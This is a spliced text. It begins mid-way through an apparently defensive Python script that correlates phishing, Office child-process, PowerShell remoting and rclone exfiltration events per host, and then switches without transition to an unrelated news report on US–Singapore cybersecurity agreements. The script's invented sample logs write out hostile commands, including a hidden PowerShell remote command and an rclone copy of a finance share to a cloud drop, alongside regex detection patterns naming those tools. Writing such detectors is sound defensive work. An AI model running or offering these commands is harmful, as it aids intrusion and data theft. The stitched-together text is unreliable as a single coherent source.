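                       "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
PS_REMOTING = re.compile(r"(invoke-command|enter-pssession|new-pssession|-computername)",
                         re.IGNORECASE)
RCLONE = re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.IGNORECASE)

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_fields(message):
    """Turn 'key=value key="value with spaces"' text into a dict (constructed format)."""
    return {k: v.strip('"') for k, v in KV.findall(message)}


def match_stages(source, message):
    """Return the set of chain stages a single log line matches."""
    f = parse_fields(message)
    hits = set()
    if source == "mail":
        attachment = f.get("attachment", "").lower()
        if attachment.endswith(".zip") and MACRO_DOC.search(f.get("contains", "")):
            hits.add("phish_attachment")
    elif source == "proc":
        parent = f.get("parent", "").lower()
        image = f.get("image", "").lower()
        cmdline = f.get("cmdline", "")
        if parent in OFFICE_PARENTS and image in SUSPICIOUS_CHILDREN:
            hits.add("office_child_process")
        # wsmprovhost.exe is the WinRM host process on the remoting target;
        # the cmdlets below are the usual source-side footprint.
        if image == "wsmprovhost.exe" or (image == "powershell.exe" and PS_REMOTING.search(cmdline)):
            hits.add("ps_remoting")
        if image == "rclone.exe" or RCLONE.search(cmdline):
            hits.add("rclone_exfil")
    return hits


def correlate(events):
    """Group stage hits per host. Alert on any exfiltration hit, or when two
    or more earlier stages line up on the same host."""
    per_host = defaultdict(set)
    for host, source, message in events:
        per_host[host] |= match_stages(source, message)
    report = {}
    for host, hits in per_host.items():
        ordered = [s for s in STAGES if s in hits]
        report[host] = {"stages": ordered,
                        "alert": "rclone_exfil" in hits or len(ordered) >= 2}
    return report


# Constructed sample telemetry: (host, source, message). All values invented.
SAMPLE_EVENTS = [
    ("WS-014", "mail", 'attachment=invoice_2021.zip contains=Invoice_Q3.docm sender=external'),
    ("WS-014", "proc", 'parent=WINWORD.EXE image=rundll32.exe '
                       'cmdline="rundll32.exe C:\\Users\\j.doe\\AppData\\Local\\Temp\\up.dll,DllRegisterServer"'),
    ("WS-014", "proc", 'parent=cmd.exe image=powershell.exe '
                       'cmdline="powershell.exe -nop -w hidden Invoke-Command -ComputerName FS-01 -ScriptBlock {whoami}"'),
    ("FS-01", "proc", 'parent=svchost.exe image=wsmprovhost.exe cmdline="wsmprovhost.exe -Embedding"'),
    ("FS-01", "proc", 'parent=cmd.exe image=rclone.exe '
                      'cmdline="rclone.exe copy D:\\Finance mega:drop --transfers 32 --config C:\\Windows\\Temp\\r.conf"'),
    # Benign host: non-macro attachment and an ordinary local PowerShell command.
    ("WS-022", "mail", 'attachment=agenda.zip contains=Agenda.docx sender=external'),
    ("WS-022", "proc", 'parent=explorer.exe image=powershell.exe cmdline="powershell.exe Get-ChildItem C:\\Users"'),
]

if __name__ == "__main__":
    for host, result in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: stages={result['stages']} alert={result['alert']}")
```

The rclone rule keys on the binary name and its verbs, so a renamed copy of the tool would only be caught by the name-independent part of the chain; in practice pair it with a file-hash or signer match. The alert threshold (exfiltration alone, or any two stages) is a starting point to tune against the false-positive rate of the Office-child-process rule in your own environment.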
The United States and Singapore have agreed to cooperate on cybersecurity and climate change issues.
On August 23, Singapore's prime minister, Lee Hsien Loong, announced that three cybersecurity agreements had been signed by the cyber, defense, and finance agencies of both countries.
The announcement was made during a visit to Singapore by US vice president Kamala Harris. On Monday, Loong and Harris spent 90 minutes together in a meeting that Harris described as "productive."
Speaking at a joint press conference on Tuesday, Harris said: “Today, we are in Singapore to stress and reaffirm our enduring relationship to this country and in this region, and to reinforce a shared vision of a free and open Indo-Pacific region, and to reaffirm our mutual interests in peace and stability in Southeast Asia.”
Loong said that the agreements would deepen collaboration between the two countries on critical technology, data security, the sharing of best practices, and infrastructure defense.
The first agreement is a bilateral Memorandum of Understanding (MOU) between the US Treasury and the Monetary Authority of Singapore that aims to help both financial sectors share information on cyber-threats to financial markets and be more prepared for and resilient to cyber-threats.
A second MOU was signed between the US Defense Department and the Singapore Ministry of Defense. The White House said the agreement "will support broad defense cooperation to advance cybersecurity information sharing, exchange of threat indicators, combined cyber training and exercises, and other forms of military-to-military cooperation on cyber issues."
The US Cybersecurity and Infrastructure Security Agency (CISA) and the Cyber Security Agency of Singapore (CSA) signed the third MOU in a bid to improve the exchange of intelligence on cyber-threats and defensive measures, increase coordination for cyber-incident response, and enable cybersecurity capacity building across Southeast Asia.
The two countries further agreed to start a new Climate Partnership oriented toward green solutions around goods, services and technology, and carbon credits.
Harris began a three-day visit to Singapore on August 22 by meeting with Singapore's president, Halimah Yacob. The meeting took place at the Istana, where a new orchid hybrid – the Papilionanda Kamala Harris – had been named in the vice president's honor.